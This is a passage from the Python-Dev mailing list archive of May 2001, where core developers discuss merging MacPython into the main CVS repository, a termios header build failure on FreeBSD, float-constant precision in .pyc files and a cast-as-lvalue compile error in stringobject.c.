a search path measn I get ugly "../Mac/Modules/foomodule.c" constructs.

I have the code for setup.py ready, is it OK if I check it in?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From loewis at informatik.hu-berlin.de  Mon May  7 11:53:54 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 7 May 2001 11:53:54 +0200 (MEST)
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>

> There's two ways I can go about this: start a new MacPython project
> or merge the MacPython stuff into the main Python CVS repository.

There is actually a third option: Use the Python SF project, but
create a new module in the Python CVS repository (so no merging would
be done).

I don't know how much code this is. I'd favour merging the Mac code
into the core distribution. If there are loads of Mac-specific modules
that not every MacPython user needs, it might be advisable to create a
distutils package that contains the extra modules. Such a package
should still live in cvs.python.sourceforge.net:/cvsroot/python.

Just my 0.02EUR,

Martin


From guido at digicool.com  Mon May  7 16:00:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 07 May 2001 09:00:08 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200."
             <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com>

[Jack]
> > There's two ways I can go about this: start a new MacPython project
> > or merge the MacPython stuff into the main Python CVS repository.

We have platform-specific subdirectories for so many projects that
it's a shame we don't have the Mac code in there as well!

The only (small) advantage I can imagine of a separate MacPython
project would be that you (Jack) can more easily give others commit
permission to the Mac tree without giving them commit permission to
all of Python (which requires they gain the trust of a larger group of
Python developers).  Of course, I don't know if you expect much help
from others who are not already Python developers.

[Martin]
> There is actually a third option: Use the Python SF project, but
> create a new module in the Python CVS repository (so no merging would
> be done).

I don't know much about modules, but would this allow Jack to check
out the main code and the MacPython code into a single work directory
(which he needs)?  If so, it may be the best solution.

Note that no matter how you do it, you'll have to submit a tree of RCS
files to the SF sysadmins to load, unless you want to lose years of
MacPython cvs logs...

> I don't know how much code this is. I'd favour merging the Mac code
> into the core distribution. If there are loads of Mac-specific modules
> that not every MacPython user needs, it might be advisable to create a
> distutils package that contains the extra modules. Such a package
> should still live in cvs.python.sourceforge.net:/cvsroot/python.

Undecidedly yours,

(Jack, regarding your Makefile and setup.py changes: I'd wait for
opinions on your patches from Neil and Andrew.  I don't see why
they would have an objection to adding these features, but the
specific implementation you propose might be subject to comments.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Mon May  7 15:04:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 7 May 2001 08:04:15 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <15094.40271.461338.638822@beluga.mojam.com>

    Jack> ... I'd like to move MacPython to sourceforge. There's two ways I
    Jack> can go about this: start a new MacPython project or merge the
    Jack> MacPython stuff into the main Python CVS repository.

I say merge.  

Skip


From nas at python.ca  Mon May  7 15:14:52 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:14:52 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200
References: <20010507094600.217CE312BA0@snelboot.oratrix.nl>
Message-ID: <20010507061452.A23494@glacier.fnational.com>

Jack Jansen wrote:
> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> of Python does not allow for an easy addition of a platform-dependent 
> sourcefile to the core interpreter (or am I missing something?).

No, its still a big ugly hack. :-)

> This is a bit of functionality I need to port the various Mac
> modules to MacOSX-python. The platform depende sourcefile has
> various glue routines for turning MacOS error codes into
> exceptions and that sort of stuff.
> 
> Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?

How would this work?  Would MACHDEP_OBJS be set by an autoconf
subsitution?

  Neil


From jack at oratrix.nl  Mon May  7 15:17:18 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:17:18 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Guido van Rossum <guido@digicool.com> ,
	     Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> 
Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>

> We have platform-specific subdirectories for so many projects that
> it's a shame we don't have the Mac code in there as well!

Great! I'll pack up my repository and send it to the 
sourceforge-powers-that-be shortly. The write permission for other MacPython 
developers shouldn't be a problem, I think Just is currently the only person 
with write permission (but I have to check).


> (Jack, regarding your Makefile and setup.py changes: I'd wait for
> opinions on your patches from Neil and Andrew.  I don't see why
> they would have an objection to adding these features, but the
> specific implementation you propose might be subject to comments.)

Definitely. I'll put them up as patches and then see what happens.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From jack at oratrix.nl  Mon May  7 15:27:14 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:27:14 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core 
In-Reply-To: Message by Neil Schemenauer <nas@python.ca> ,
	     Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> 
Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl>

> Jack Jansen wrote:
> > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> > of Python does not allow for an easy addition of a platform-dependent 
> > sourcefile to the core interpreter (or am I missing something?).
> [...]
> > 
> > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
> 
> How would this work?  Would MACHDEP_OBJS be set by an autoconf
> subsitution?

Yes, that's what I had in mind (haven't written the code yet). Similar to the 
way DYNLOADFILE is set, but empty for all platforms except for OSX.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From nas at python.ca  Mon May  7 15:30:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:30:42 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200
References: <nas@python.ca> <20010507132714.B0808312BA1@snelboot.oratrix.nl>
Message-ID: <20010507063042.D23494@glacier.fnational.com>

Jack Jansen wrote:
> Yes, that's what I had in mind (haven't written the code yet). Similar to the 
> way DYNLOADFILE is set, but empty for all platforms except for OSX.

Sounds good to me.  Try to keep the code somewhat general so that
other platforms may use it.

  Neil


From mal at lemburg.com  Mon May  7 20:44:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 07 May 2001 20:44:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
	            <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com>
Message-ID: <3AF6ED27.FB2C077B@lemburg.com>

Guido van Rossum wrote:
> 
> > I've attached the patch. Due to a small reorganisation the
> > patch is a little longer -- symmetry has its price at C level
> > too ;-)
> 
> Looks good on paper, so go ahead and check it in.  Watch out for
> potential changes caused by Tim's iter-crusade!  :-)

OK. I'll look into this later this week.
 
> While you're at it, why don't you check in the rot13 codec you posted
> -- it's good to have simle examples in the standard library.
> It would also be cool to have codecs for common file encodings like
> base64, quoted-printable, binhex, uuencode, and even hex
> (binascii.hexlify).

Right. I'll add these in the next few weeks -- as time comes
along.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From martin at loewis.home.cs.tu-berlin.de  Mon May  7 23:21:27 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 7 May 2001 23:21:27 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de>

> I don't know much about modules, but would this allow Jack to check
> out the main code and the MacPython code into a single work
> directory (which he needs)?

Using CVS modules allows to merge parts of the tree into a single
sandbox. E.g. you could do

macpython python/dist/src &Mac

'cvs co macpython' then would give you a dist/src directory, which
also contains a Mac directory (where Mac is another module, alongside
with /python, or a CVSROOT/modules entry).

You could use an exclude list, e.g.

macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all
files in a single directory must come from the same CVS module - you
can think of ampersand modules similar to Unix mount(1)ed file
systems.

Regards,
Martin


From tim.one at home.com  Tue May  8 06:14:22 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:14:22 -0400
Subject: [Python-Dev] Help with SF bug 105470
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMFKAAA.tim.one@home.com>

An ancient bug just got (re?)discovered on c.l.py, which I entered into SF:

http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&
    atid=105470

This has to do w/ gross loss of precision in manifest Python float constants,
if and only if a module is loaded from .pyc or .pyo format.  Since's it's
fp-related, and fp is tricky x-platform, I'd like some volunteers to test
this before I check it in.

Current CVS Python contains a dormant test case.  There's a patch attached to
the bug report that activates the test case, and tries to repair the problem.
After the patch, the fix works if and only if test_import doesn't fail,
neither after deleting all .pyc/.pyo files first, nor if run a second time
w/o deleting .pyc/.pyo.

Works on Win98SE, but you may have already guessed that <wink>.


From tim.one at home.com  Tue May  8 06:52:37 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:52:37 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>

[Jeremy Hylton, on python-checkins]
> ...
> XXX When should nested scopes by made non-optional on the trunk?

Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
have trouble sleeping tonight <wink>.


From thomas at xs4all.net  Tue May  8 12:14:20 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 12:14:20 +0200
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org>
Message-ID: <20010508121420.Y16486@xs4all.nl>

On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote:

> >>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

>     | Why not let us spell this as:
>     | 	class X(Y):
>     | 		from Y import foo as _sfoo, bar as _sbar
>     | 		...

>     NS> This already has a meaning in Python.  Paul's suggested syntax
>     NS> is pretty neat, IMHO.

> Not if Y is a class though, right?  That would currently raise an
> ImportError, ...

Nope:

>>> class string:
...     pass
... 
>>> from string import split
>>> string
<class __main__.string at 8072e90>
>>> 

That could be considered a misfeature for more than one reason (like
importing from non-module objects, which you now do by inserting the object
into sys.modules) but can't be fixed without breaking backward
compatibility, except by inventing new syntax.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From Mark.Favas at per.dem.csiro.au  Tue May  8 12:34:37 2001
From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat))
Date: Tue, 8 May 2001 18:34:37 +0800 
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>

A change to termios.c in the last couple of days to #include termio.h as
well as termios.h breaks the build on FreeBSD, which has only termios.h -
needs an autoconf test? There'll probably be other similar systems.

Cheers, Mark 


From thomas at xs4all.net  Tue May  8 13:36:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 13:36:38 +0200
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>
Message-ID: <20010508133638.Z16486@xs4all.nl>

On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote:

> Given the new dict iterators in 2.2, there's an easier fast way that doesn't
> mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Tue May  8 14:10:00 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:10:00 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <20010508141000.A16486@xs4all.nl>

On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote:

> The Mac specific stuff for Python is all concentrated in a single subtree Mac 
> of the main Python tree (the subtree has its own hierarchy of 
> Python/Modules/Lib/etc directories), so putting it in the main repository 
> should not pollute the filenamespace all that much. It would also have the 
> advantage that a single "cvs update" would update everything (whereas the 
> current situation for Mac developers, where Python/Mac is from a different 
> CVSROOT than Python, does not have that advantage). The downside is that 
> everyone who does a full checkout of the tree would get an extra 1000 or so 
> files on their disk that are pretty useless unless they have a mac.

I'd say merge, except that the number '1000' is very large. Is it really
1000 ? The current Python tree contains only 304 .c and .h files, about 1000
.py files spread out over the tree (567 of which in Lib, the rest in
Demo/Tools) and obviously some misc files and CVS stuff, for a total of
around 2500 files. Is that 1000 a real number ? No temp files,
auto-generated files, .o files etc ? How large are they ? (the average size
in the current CVS tree is about 10k)

I'd probably still say 'merge', I'm just curious where the large number of
files comes from. Is it to keep the changes to the original files minimal ?
Given the number of platform-dependant #ifdefs and differently-defined
macro's we're using now, I don't see why some of those changes couldn't be
moved into the original files, if that's the case.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Tue May  8 14:13:39 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:13:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200
References: <guido@digicool.com> <20010507131718.C22B7312BA1@snelboot.oratrix.nl>
Message-ID: <20010508141339.B16486@xs4all.nl>

On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote:

> > We have platform-specific subdirectories for so many projects that
> > it's a shame we don't have the Mac code in there as well!

> Great! I'll pack up my repository and send it to the 
> sourceforge-powers-that-be shortly. The write permission for other MacPython 
> developers shouldn't be a problem, I think Just is currently the only person 
> with write permission (but I have to check).

That doesn't mean there isn't a problem. Just doesn't have write access :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido at digicool.com  Tue May  8 15:35:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:35:50 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400."
             <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com>

> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes by made non-optional on the trunk?

[Tim]
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> have trouble sleeping tonight <wink>.

+1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May  8 15:41:42 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:41:42 -0500
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800."
             <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com>

> A change to termios.c in the last couple of days to #include termio.h as
> well as termios.h breaks the build on FreeBSD, which has only termios.h -
> needs an autoconf test? There'll probably be other similar systems.

Frankly, I don't see the point of including termio.h at all -- it
seems to be a backwards compatibility file.

Mark, can you please enter this in the bug database and assign it to
whoever checked in the change? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Tue May  8 16:05:01 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 8 May 2001 07:05:01 -0700
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400
References: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <20010508070501.A25794@glacier.fnational.com>

Tim Peters wrote:
> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes by made non-optional on the trunk?
> 
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> have trouble sleeping tonight <wink>.

Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?

  Neil


From jack at oratrix.nl  Tue May  8 16:07:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue, 08 May 2001 16:07:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> 
Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl>

> I'd say merge, except that the number '1000' is very large. Is it really
> 1000 ? The current Python tree contains only 304 .c and .h files, about 1000
> .py files spread out over the tree (567 of which in Lib, the rest in
> Demo/Tools) and obviously some misc files and CVS stuff, for a total of
> around 2500 files. Is that 1000 a real number ? No temp files,
> auto-generated files, .o files etc ? How large are they ? (the average size
> in the current CVS tree is about 10k)

It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
system), 30 resource files and then assorted things (html documentation, 
scripts to drive the distribution builder, etc).

The .xml and .exp files and about 20 of the .c files are machine generated, so 
they could technically be left out of the repository. The generation process 
of these files is a bit painful, though, so I've added them as a convenience 
(the reasoning is a bit along the lines of the Grammar stuff of the core).

The one thing that I should do is clean out the "Unsupported" directory before 
doing the merge. It contains some stuff that is long dead. But then, it isn't 
all that many files.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From mwh at python.net  Tue May  8 16:41:45 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 8 May 2001 15:41:45 +0100 (BST)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
Message-ID: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>

Guido van Rossum <guido at digicool.com> writes:

> > A change to termios.c in the last couple of days to #include termio.h
> > as well as termios.h breaks the build on FreeBSD, which has only
> > termios.h - needs an autoconf test? There'll probably be other similar
> > systems.
>
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.

If you don't include termio.h the build breaks on alpha/OSF1.  This
sounds to me like OSF1's headers are broken (you can't include
sys/ioctl.h without including termio.h first, it seems, or you get
complaints about struct termio being undefined).  So I'd suggest

+#ifdef __osf__
 #include <termio.h>
+#endif

and then see if the build breaks anywhere else (I love unix).

Using the sf compile farm, I've tested this on FreeBSD, Linux/x86,
Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives
a pile of warnings from redefined macros and then dies 'cause it can't
find a valiud license file).

So we might need some more magic for solaris using cc.

Cheers,
M.

-- 
  Imagine if every Thursday your shoes exploded if you tied them
  the usual way.  This happens to us all the time with computers,
  and nobody thinks of complaining.                     -- Jeff Raskin


From fdrake at acm.org  Tue May  8 16:45:18 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
In-Reply-To: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > If you don't include termio.h the build breaks on alpha/OSF1.  This
 > sounds to me like OSF1's headers are broken (you can't include
 > sys/ioctl.h without including termio.h first, it seems, or you get
 > complaints about struct termio being undefined).  So I'd suggest
 > 
 > +#ifdef __osf__
 >  #include <termio.h>
 > +#endif
 > 
 > and then see if the build breaks anywhere else (I love unix).

  Does it make more sense to do this or to test for termio.h in
configure?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas at per.dem.csiro.au  Tue May  8 16:47:39 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Tue, 08 May 2001 22:47:39 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com>
Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au>

Guido van Rossum wrote:
> 
> > A change to termios.c in the last couple of days to #include termio.h as
> > well as termios.h breaks the build on FreeBSD, which has only termios.h -
> > needs an autoconf test? There'll probably be other similar systems.
> 
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.
> 
> Mark, can you please enter this in the bug database and assign it to
> whoever checked in the change? :-)

Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred
Drake <grin>

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From thomas at xs4all.net  Tue May  8 17:52:49 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 17:52:49 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200
References: <thomas@xs4all.net> <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <20010508175248.E16486@xs4all.nl>

On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote:

[ Jack wants to add the +/- 1000 extra files from the MacPython source tree
  to the Python CVS repository ]

> It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
> Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
> system), 30 resource files and then assorted things (html documentation, 
> scripts to drive the distribution builder, etc).

I'd say merge it. If there had been decent CVS clients for the mac when you
started, those files would have been in the CVS tree already. 

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip at pobox.com  Tue May  8 20:22:17 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 8 May 2001 13:22:17 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>
References: <thomas@xs4all.net>
	<20010508141000.A16486@xs4all.nl>
	<20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <15096.14681.773554.729550@beluga.mojam.com>

    Jack> It's actually 830 files. ... 120 .c/.h files ...

How many of those 120 files are variants of existing source files that (in
theory) could be merged with their mainline counterparts?

Skip


From mwh at python.net  Wed May  9 00:27:59 2001
From: mwh at python.net (Michael Hudson)
Date: 08 May 2001 23:27:59 +0100
Subject: [Python-Dev] Recent change to termios module breaks build on  FreeBSD
In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)"
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain> <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>
Message-ID: <m3pudjscgg.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > If you don't include termio.h the build breaks on alpha/OSF1.  This
>  > sounds to me like OSF1's headers are broken (you can't include
>  > sys/ioctl.h without including termio.h first, it seems, or you get
>  > complaints about struct termio being undefined).  So I'd suggest
>  > 
>  > +#ifdef __osf__
>  >  #include <termio.h>
>  > +#endif
>  > 
>  > and then see if the build breaks anywhere else (I love unix).
> 
>   Does it make more sense to do this or to test for termio.h in
> configure?

If you're asking *me*, I have no idea.  I'd hope that no system would
be as broken as osf1 is in this regard, but then I'd have hoped that
osf1 wasn't this broken too...

I guess the test in configure is "safer" in some sense.  Getting this
perfectly right would probably require more autoconf hackery than one
can possibly imagine... ncurses generates an amk script from
./configure that is then run to produce term.h, but I'm not sure that
all of that is devoted to including the right headers.

can-we-just-have-TERMIOS-back?-ly y'rs
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From tim.one at home.com  Wed May  9 08:48:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 02:48:12 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <20010508133638.Z16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAAKBAA.tim.one@home.com>

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
> arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that.  If "arbitrary" suffices, then by defn. *any*
element is "good enough".  If it's not good enough to get the same one back
every time, then I want a stronger guarantee about what arb() returns than
the inexplicable behavior of repeated calls to dict.iteritems().next in the
presence of dict mutation.  But as I've said several times before <wink>, I'm
still asking for an algorithm where arb() is actually useful (as opposed to
.popitem(), which is dead easy to explain in the presence of mutation; your
version of arb() can, e.g., return a given entry more than once, may skip
entries, and may raise StopIteration with unexamined entries remaining in the
dict).

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly
    y'rs  - tim


From tim.one at home.com  Wed May  9 09:42:00 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 03:42:00 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark!  Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows <wink>.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough:  I tried to use a cast as an lvalue in those 4 places, all of
the form:

    		PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*.  Strictly speaking, that ain't legal,
but changing it to:

		PyObject *t = (PyObject *)op;
    		PyString_InternInPlace(&t);

is.  You may wonder WTF the difference is.  That's easy:  the rewrite doesn't
